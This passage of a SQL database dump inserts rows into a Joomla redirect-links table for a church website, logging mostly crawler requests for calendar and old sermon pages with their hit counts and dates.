(1391, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/24/-', NULL, '', '', 1, 0, '2017-01-10 21:03:38', '0000-00-00 00:00:00', 301),
(1392, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1911/6/-', NULL, '', '', 1, 0, '2017-01-10 21:03:46', '0000-00-00 00:00:00', 301),
(1393, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/28/-', NULL, '', '', 1, 0, '2017-01-10 21:04:00', '0000-00-00 00:00:00', 301),
(1394, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1908/1/-', NULL, '', '', 1, 0, '2017-01-10 21:04:15', '0000-00-00 00:00:00', 301),
(1395, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1911/4/-', NULL, '', '', 1, 0, '2017-01-10 21:04:30', '0000-00-00 00:00:00', 301),
(1396, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/14/-', NULL, '', '', 1, 0, '2017-01-10 21:04:46', '0000-00-00 00:00:00', 301),
(1397, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/15/-', NULL, '', '', 1, 0, '2017-01-10 21:05:06', '0000-00-00 00:00:00', 301),
(1398, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1910/3/-', NULL, '', '', 1, 0, '2017-01-10 21:05:36', '0000-00-00 00:00:00', 301),
(1399, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/6/-', NULL, '', '', 1, 0, '2017-01-10 21:05:43', '0000-00-00 00:00:00', 301),
(1400, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1917/5/-', NULL, '', '', 1, 0, '2017-01-10 21:05:50', '0000-00-00 00:00:00', 301),
(1401, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1908/12/-', NULL, '', '', 1, 0, '2017-01-10 21:05:58', '0000-00-00 00:00:00', 301),
(1402, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1909/5/-', NULL, '', '', 1, 0, '2017-01-10 21:06:05', '0000-00-00 00:00:00', 301),
(1403, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/15/-', NULL, '', '', 1, 0, '2017-01-10 21:06:12', '0000-00-00 00:00:00', 301),
(1404, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/3/-', NULL, '', '', 1, 0, '2017-01-10 21:06:27', '0000-00-00 00:00:00', 301),
(1405, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/20/-', NULL, '', '', 1, 0, '2017-01-10 21:06:42', '0000-00-00 00:00:00', 301),
(1406, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/28/-', NULL, '', '', 1, 0, '2017-01-10 21:06:49', '0000-00-00 00:00:00', 301),
(1407, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/25/-', NULL, '', '', 1, 0, '2017-01-10 21:06:57', '0000-00-00 00:00:00', 301),
(1408, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1910/6/-', NULL, '', '', 1, 0, '2017-01-10 21:07:04', '0000-00-00 00:00:00', 301),
(1409, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/24/-', NULL, '', '', 1, 0, '2017-01-10 21:07:11', '0000-00-00 00:00:00', 301),
(1410, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/19/-', NULL, '', '', 1, 0, '2017-01-10 21:07:19', '0000-00-00 00:00:00', 301),
(1411, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1907/10/-', NULL, '', '', 1, 0, '2017-01-10 21:07:26', '0000-00-00 00:00:00', 301),
(1412, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1906/11/-', NULL, '', '', 1, 0, '2017-01-10 21:07:37', '0000-00-00 00:00:00', 301),
(1413, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1910/7/-', NULL, '', '', 1, 0, '2017-01-10 21:07:40', '0000-00-00 00:00:00', 301),
(1414, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1906/1/-', NULL, '', '', 1, 0, '2017-01-10 21:07:53', '0000-00-00 00:00:00', 301),
(1415, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest', NULL, '', '', 1, 0, '2017-01-10 22:21:17', '0000-00-00 00:00:00', 301),
(1416, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/', NULL, '', '', 1, 0, '2017-01-11 00:11:50', '0000-00-00 00:00:00', 301),
(1417, 'http://www.lifeoasisinternationalchurch.org/11-demo-articles/10-preset-styles', NULL, '', '', 7, 0, '2017-01-11 01:49:23', '0000-00-00 00:00:00', 301),
(1418, 'http://www.lifeoasisinternationalchurch.org/resources/blog/item/', NULL, '', '', 1, 0, '2017-01-11 02:27:26', '0000-00-00 00:00:00', 301),
(1419, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=item&id=2:be-kind-whenever-possible&Itemid=623', NULL, '', '', 3, 0, '2017-01-11 02:44:27', '0000-00-00 00:00:00', 301),
(1420, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/7/-', NULL, '', '', 1, 0, '2017-01-11 03:08:11', '0000-00-00 00:00:00', 301),
(1421, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1907/2/-', NULL, '', '', 1, 0, '2017-01-11 03:08:22', '0000-00-00 00:00:00', 301),
(1422, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1919/5/-', NULL, '', '', 1, 0, '2017-01-11 03:08:50', '0000-00-00 00:00:00', 301),
(1423, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/15/-', NULL, '', '', 1, 0, '2017-01-11 03:09:03', '0000-00-00 00:00:00', 301),
(1424, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/26/-', NULL, '', '', 1, 0, '2017-01-11 03:09:17', '0000-00-00 00:00:00', 301),
(1425, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/13/-', NULL, '', '', 1, 0, '2017-01-11 03:09:46', '0000-00-00 00:00:00', 301),
(1426, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1905/11/-', NULL, '', '', 1, 0, '2017-01-11 03:10:12', '0000-00-00 00:00:00', 301),
(1427, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/11/-', NULL, '', '', 1, 0, '2017-01-11 03:10:28', '0000-00-00 00:00:00', 301),
(1428, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/17/-', NULL, '', '', 1, 0, '2017-01-11 03:10:38', '0000-00-00 00:00:00', 301),
(1429, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/26/-', NULL, '', '', 1, 0, '2017-01-11 03:10:54', '0000-00-00 00:00:00', 301),
(1430, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/12/-', NULL, '', '', 1, 0, '2017-01-11 03:11:07', '0000-00-00 00:00:00', 301),
(1431, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/21/-', NULL, '', '', 1, 0, '2017-01-11 03:11:28', '0000-00-00 00:00:00', 301),
(1432, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1906/12/-', NULL, '', '', 1, 0, '2017-01-11 03:11:34', '0000-00-00 00:00:00', 301),
(1433, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1919/4/-', NULL, '', '', 1, 0, '2017-01-11 03:11:49', '0000-00-00 00:00:00', 301),
(1434, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1909/7/-', NULL, '', '', 1, 0, '2017-01-11 03:12:03', '0000-00-00 00:00:00', 301),
(1435, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1910/8/-', NULL, '', '', 1, 0, '2017-01-11 03:12:17', '0000-00-00 00:00:00', 301),
(1436, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/19/-', NULL, '', '', 1, 0, '2017-01-11 03:17:38', '0000-00-00 00:00:00', 301),
(1437, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/2/-', NULL, '', '', 1, 0, '2017-01-11 03:32:46', '0000-00-00 00:00:00', 301),
(1438, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1905/10/-', NULL, '', '', 1, 0, '2017-01-11 03:48:11', '0000-00-00 00:00:00', 301),
(1439, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1904/1/-', NULL, '', '', 1, 0, '2017-01-11 04:03:02', '0000-00-00 00:00:00', 301),
(1440, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1905/2/-', NULL, '', '', 1, 0, '2017-01-11 04:18:10', '0000-00-00 00:00:00', 301),
(1441, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/30-tapping-into-the-anointing-for-increase-3', NULL, '', '', 29, 0, '2017-01-11 04:20:27', '0000-00-00 00:00:00', 301),
(1442, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/9/-', NULL, '', '', 1, 0, '2017-01-11 04:33:25', '0000-00-00 00:00:00', 301),
(1443, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1920/4/-', NULL, '', '', 1, 0, '2017-01-11 04:48:26', '0000-00-00 00:00:00', 301),
(1444, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/21/-', NULL, '', '', 1, 0, '2017-01-11 05:03:38', '0000-00-00 00:00:00', 301),
(1445, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1907/4/-', NULL, '', '', 1, 0, '2017-01-11 05:22:43', '0000-00-00 00:00:00', 301),
(1446, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1910/9/-', NULL, '', '', 1, 0, '2017-01-11 05:33:48', '0000-00-00 00:00:00', 301),
(1447, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/22/-', NULL, '', '', 1, 0, '2017-01-11 05:52:45', '0000-00-00 00:00:00', 301),
(1448, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1919/3/-', NULL, '', '', 1, 0, '2017-01-11 06:07:52', '0000-00-00 00:00:00', 301),
(1449, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1908/3/-', NULL, '', '', 1, 0, '2017-01-11 06:23:00', '0000-00-00 00:00:00', 301),
(1450, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1904/12/-', NULL, '', '', 1, 0, '2017-01-11 06:38:09', '0000-00-00 00:00:00', 301),
(1451, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/28/-', NULL, '', '', 1, 0, '2017-01-11 06:53:16', '0000-00-00 00:00:00', 301),
(1452, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1904/2/-', NULL, '', '', 1, 0, '2017-01-11 07:08:25', '0000-00-00 00:00:00', 301),
(1453, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1920/3/-', NULL, '', '', 1, 0, '2017-01-11 07:23:31', '0000-00-00 00:00:00', 301),
(1454, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1921/4/-', NULL, '', '', 1, 0, '2017-01-11 07:42:27', '0000-00-00 00:00:00', 301),
(1455, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/16/-', NULL, '', '', 1, 0, '2017-01-11 07:57:35', '0000-00-00 00:00:00', 301),
(1456, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/16/-', NULL, '', '', 1, 0, '2017-01-11 08:12:43', '0000-00-00 00:00:00', 301),
(1457, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/15/-', NULL, '', '', 1, 0, '2017-01-11 08:27:51', '0000-00-00 00:00:00', 301),
(1458, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/23/-', NULL, '', '', 1, 0, '2017-01-11 08:42:58', '0000-00-00 00:00:00', 301),
(1459, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=AudioJungle&Itemid=775', NULL, '', '', 1, 0, '2017-01-11 09:22:45', '0000-00-00 00:00:00', 301),
(1460, 'https://142.4.21.132/recordings/index.php', NULL, '', '', 10, 0, '2017-01-11 09:23:28', '0000-00-00 00:00:00', 301),
(1461, 'http://www.lifeoasisinternationalchurch.org/component/content/category/12-sample-content', NULL, '', '', 3, 0, '2017-01-11 10:06:04', '0000-00-00 00:00:00', 301),
(1462, 'http://www.lifeoasisinternationalchurch.org/template-info-2/dream-centre-ordained-pastors', NULL, '', '', 51, 0, '2017-01-11 10:27:10', '0000-00-00 00:00:00', 301),
(1463, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1903/10/-', NULL, '', '', 1, 0, '2017-01-11 11:39:46', '0000-00-00 00:00:00', 301),
(1464, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/19/-', NULL, '', '', 1, 0, '2017-01-11 11:40:04', '0000-00-00 00:00:00', 301),
(1465, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/14/-', NULL, '', '', 1, 0, '2017-01-11 11:40:30', '0000-00-00 00:00:00', 301),
(1466, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/12/-', NULL, '', '', 1, 0, '2017-01-11 11:40:57', '0000-00-00 00:00:00', 301),
(1467, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1908/9/-', NULL, '', '', 1, 0, '2017-01-11 11:41:20', '0000-00-00 00:00:00', 301),
(1468, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1902/1/-', NULL, '', '', 1, 0, '2017-01-11 11:41:46', '0000-00-00 00:00:00', 301),
(1469, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1921/3/-', NULL, '', '', 1, 0, '2017-01-11 11:48:41', '0000-00-00 00:00:00', 301),
(1470, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/22/-', NULL, '', '', 1, 0, '2017-01-11 12:07:40', '0000-00-00 00:00:00', 301),
(1471, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1901/11/-', NULL, '', '', 1, 0, '2017-01-11 12:22:42', '0000-00-00 00:00:00', 301),
(1472, 'http://ljmti.lifeoasisinternationalchurch.org/digital/rtl-language-ready', NULL, '', '', 1, 0, '2017-01-11 12:23:22', '0000-00-00 00:00:00', 301),
(1473, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1921/2/-', NULL, '', '', 1, 0, '2017-01-11 12:37:50', '0000-00-00 00:00:00', 301),
(1474, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/27/-', NULL, '', '', 1, 0, '2017-01-11 12:52:56', '0000-00-00 00:00:00', 301),
(1475, 'http://www.lifeoasisinternationalchurch.org/template-info-2/rev-oyenike-areogun', NULL, '', '', 57, 0, '2017-01-11 13:03:22', '0000-00-00 00:00:00', 301),
(1476, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/28/-', NULL, '', '', 1, 0, '2017-01-11 13:08:16', '0000-00-00 00:00:00', 301),
(1477, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=51&Itemid=241', NULL, '', '', 3, 0, '2017-01-11 13:10:09', '0000-00-00 00:00:00', 301),
(1478, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1902/2/-', NULL, '', '', 1, 0, '2017-01-11 13:23:12', '0000-00-00 00:00:00', 301),
(1479, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/28/-', NULL, '', '', 1, 0, '2017-01-11 13:38:21', '0000-00-00 00:00:00', 301),
(1480, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/27/-', NULL, '', '', 1, 0, '2017-01-11 13:53:30', '0000-00-00 00:00:00', 301),
(1481, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1908/8/-', NULL, '', '', 1, 0, '2017-01-11 14:12:23', '0000-00-00 00:00:00', 301),
(1482, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1922/3/-', NULL, '', '', 1, 0, '2017-01-11 14:23:50', '0000-00-00 00:00:00', 301),
(1483, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1901/1/-', NULL, '', '', 1, 0, '2017-01-11 14:42:39', '0000-00-00 00:00:00', 301),
(1484, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1901/12/-', NULL, '', '', 1, 0, '2017-01-11 14:57:49', '0000-00-00 00:00:00', 301),
(1485, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/10-grace-2', NULL, '', '', 24, 0, '2017-01-11 14:58:50', '0000-00-00 00:00:00', 301),
(1486, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/17-entering-into-winning-position-5', NULL, '', '', 31, 0, '2017-01-11 15:12:21', '0000-00-00 00:00:00', 301),
(1487, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/21/-', NULL, '', '', 1, 0, '2017-01-11 15:12:57', '0000-00-00 00:00:00', 301),
(1488, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/10/-', NULL, '', '', 1, 0, '2017-01-11 15:24:19', '0000-00-00 00:00:00', 301),
(1489, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/14/-', NULL, '', '', 1, 0, '2017-01-11 15:28:03', '0000-00-00 00:00:00', 301),
(1490, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1901/10/-', NULL, '', '', 1, 0, '2017-01-11 15:31:51', '0000-00-00 00:00:00', 301),
(1491, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/16/-', NULL, '', '', 1, 0, '2017-01-11 15:35:42', '0000-00-00 00:00:00', 301),
(1492, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/5/-', NULL, '', '', 1, 0, '2017-01-11 15:39:27', '0000-00-00 00:00:00', 301),
(1493, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/7/-', NULL, '', '', 1, 0, '2017-01-11 15:43:19', '0000-00-00 00:00:00', 301),
(1494, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1907/8/-', NULL, '', '', 1, 0, '2017-01-11 15:47:00', '0000-00-00 00:00:00', 301),
(1495, 'http://lifeoasisinternationalchurch.org/index.php/template-info/wimmp', NULL, '', '', 28, 0, '2017-01-11 15:50:17', '0000-00-00 00:00:00', 301),
(1496, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1922/2/-', NULL, '', '', 1, 0, '2017-01-11 15:50:59', '0000-00-00 00:00:00', 301),
(1497, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/1/-', NULL, '', '', 1, 0, '2017-01-11 15:54:34', '0000-00-00 00:00:00', 301),
(1498, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1923/2/-', NULL, '', '', 1, 0, '2017-01-11 15:58:29', '0000-00-00 00:00:00', 301),
(1499, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/19/-', NULL, '', '', 1, 0, '2017-01-11 16:02:08', '0000-00-00 00:00:00', 301),
(1500, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1899/1/-', NULL, '', '', 1, 0, '2017-01-11 16:05:55', '0000-00-00 00:00:00', 301),
(1501, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1907/7/-', NULL, '', '', 1, 0, '2017-01-11 16:09:42', '0000-00-00 00:00:00', 301),
(1502, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/15/-', NULL, '', '', 1, 0, '2017-01-11 16:13:42', '0000-00-00 00:00:00', 301),
(1503, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1923/1/-', NULL, '', '', 1, 0, '2017-01-11 16:17:17', '0000-00-00 00:00:00', 301),
(1504, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/25/-', NULL, '', '', 1, 0, '2017-01-11 16:21:03', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(1505, 'http://lifeoasisinternationalchurch.org/if', NULL, '', '', 1, 0, '2017-01-11 16:38:01', '0000-00-00 00:00:00', 301),
(1506, 'http://www.lifeoasisinternationalchurch.org/webconfig.txt.php', NULL, 'http://www.lifeoasisinternationalchurch.org/webconfig.txt.php', '', 1, 0, '2017-01-11 17:16:49', '0000-00-00 00:00:00', 301),
(1507, 'http://www.lifeoasisinternationalchurch.org/kingdombuilders/', NULL, '', '', 2, 0, '2017-01-11 17:23:59', '0000-00-00 00:00:00', 301),
(1508, 'http://lifeoasisinternationalchurch.org/template-info/gin', NULL, '', '', 44, 0, '2017-01-11 17:27:20', '0000-00-00 00:00:00', 301),
(1509, 'http://lifeoasisinternationalchurch.org/template-info/books', NULL, '', '', 4, 0, '2017-01-11 17:53:41', '0000-00-00 00:00:00', 301),
(1510, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/22/-', NULL, '', '', 1, 0, '2017-01-11 18:23:23', '0000-00-00 00:00:00', 301),
(1511, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1900/3/-', NULL, '', '', 1, 0, '2017-01-11 18:23:33', '0000-00-00 00:00:00', 301),
(1512, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1907/6/-', NULL, '', '', 1, 0, '2017-01-11 18:23:41', '0000-00-00 00:00:00', 301),
(1513, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1906/9/-', NULL, '', '', 1, 0, '2017-01-11 18:23:50', '0000-00-00 00:00:00', 301),
(1514, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1905/8/-', NULL, '', '', 1, 0, '2017-01-11 18:24:03', '0000-00-00 00:00:00', 301),
(1515, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/25/-', NULL, '', '', 1, 0, '2017-01-11 18:24:16', '0000-00-00 00:00:00', 301),
(1516, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/16/-', NULL, '', '', 1, 0, '2017-01-11 18:24:30', '0000-00-00 00:00:00', 301),
(1517, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/15/-', NULL, '', '', 1, 0, '2017-01-11 18:24:41', '0000-00-00 00:00:00', 301),
(1518, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1924/2/-', NULL, '', '', 1, 0, '2017-01-11 18:24:53', '0000-00-00 00:00:00', 301),
(1519, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1899/2/-', NULL, '', '', 1, 0, '2017-01-11 18:25:06', '0000-00-00 00:00:00', 301),
(1520, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1898/12/-', NULL, '', '', 1, 0, '2017-01-11 18:25:18', '0000-00-00 00:00:00', 301),
(1521, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/21/-', NULL, '', '', 1, 0, '2017-01-11 18:25:30', '0000-00-00 00:00:00', 301),
(1522, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/18/-', NULL, '', '', 1, 0, '2017-01-11 18:25:47', '0000-00-00 00:00:00', 301),
(1523, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/14/-', NULL, '', '', 1, 0, '2017-01-11 18:25:54', '0000-00-00 00:00:00', 301),
(1524, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/2/-', NULL, '', '', 1, 0, '2017-01-11 18:26:06', '0000-00-00 00:00:00', 301),
(1525, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1906/6/-', NULL, '', '', 1, 0, '2017-01-11 18:26:17', '0000-00-00 00:00:00', 301),
(1526, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/23/-', NULL, '', '', 1, 0, '2017-01-11 18:26:38', '0000-00-00 00:00:00', 301),
(1527, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/18/-', NULL, '', '', 1, 0, '2017-01-11 18:26:40', '0000-00-00 00:00:00', 301),
(1528, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1897/12/-', NULL, '', '', 1, 0, '2017-01-11 18:26:52', '0000-00-00 00:00:00', 301),
(1529, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1922/12/-', NULL, '', '', 1, 0, '2017-01-11 18:27:03', '0000-00-00 00:00:00', 301),
(1530, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/6/-', NULL, '', '', 1, 0, '2017-01-11 18:27:25', '0000-00-00 00:00:00', 301),
(1531, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/6/-', NULL, '', '', 1, 0, '2017-01-11 18:27:25', '0000-00-00 00:00:00', 301),
(1532, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1898/3/-', NULL, '', '', 1, 0, '2017-01-11 18:27:37', '0000-00-00 00:00:00', 301),
(1533, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1905/6/-', NULL, '', '', 1, 0, '2017-01-11 18:27:47', '0000-00-00 00:00:00', 301),
(1534, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/6/-', NULL, '', '', 1, 0, '2017-01-11 18:27:59', '0000-00-00 00:00:00', 301),
(1535, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1897/2/-', NULL, '', '', 1, 0, '2017-01-11 18:28:23', '0000-00-00 00:00:00', 301),
(1536, 'http://www.lifeoasisinternationalchurch.org/about-us/dream-centre-ordained-pastors/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-11 18:54:37', '0000-00-00 00:00:00', 301),
(1537, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/17', NULL, '', '', 4, 0, '2017-01-11 18:56:04', '0000-00-00 00:00:00', 301),
(1538, 'http://lifeoasisinternationalchurch.org/component/content/article/2-uncategorised/60-destinytv', NULL, '', '', 1, 0, '2017-01-11 19:43:19', '0000-00-00 00:00:00', 301),
(1539, 'http://lifeoasisinternationalchurch.org/index.php/template-info/books/18-loic/50-young-achievers', NULL, '', '', 8, 0, '2017-01-11 20:48:38', '0000-00-00 00:00:00', 301),
(1540, 'http://www.lifeoasisinternationalchurch.org/12-sample-content/16-sample-content-5', NULL, '', '', 4, 0, '2017-01-11 20:54:25', '0000-00-00 00:00:00', 301),
(1541, 'http://lifeoasisinternationalchurch.org/youtube', NULL, '', '', 1, 0, '2017-01-11 21:47:52', '0000-00-00 00:00:00', 301),
(1542, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/25', NULL, '', '', 3, 0, '2017-01-11 22:33:23', '0000-00-00 00:00:00', 301),
(1543, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info-2/the-church', NULL, '', '', 14, 0, '2017-01-11 22:49:49', '0000-00-00 00:00:00', 301),
(1544, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/19-army-of-the-lord-2', NULL, '', '', 5, 0, '2017-01-11 23:53:09', '0000-00-00 00:00:00', 301),
(1545, 'http://www.lifeoasisinternationalchurch.org/resources/youtube-live/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-11 23:59:30', '0000-00-00 00:00:00', 301),
(1546, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/6-dark-side-of-the-anointing-4', NULL, '', '', 21, 0, '2017-01-12 00:06:10', '0000-00-00 00:00:00', 301),
(1547, 'http://www.lifeoasisinternationalchurch.org/template-info/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 1, 0, '2017-01-12 00:07:41', '0000-00-00 00:00:00', 301),
(1548, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/16-entering-into-winning-position-4', NULL, '', '', 6, 0, '2017-01-12 00:07:43', '0000-00-00 00:00:00', 301),
(1549, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/itemlist/tag/WordPress', NULL, '', '', 1, 0, '2017-01-12 00:08:32', '0000-00-00 00:00:00', 301),
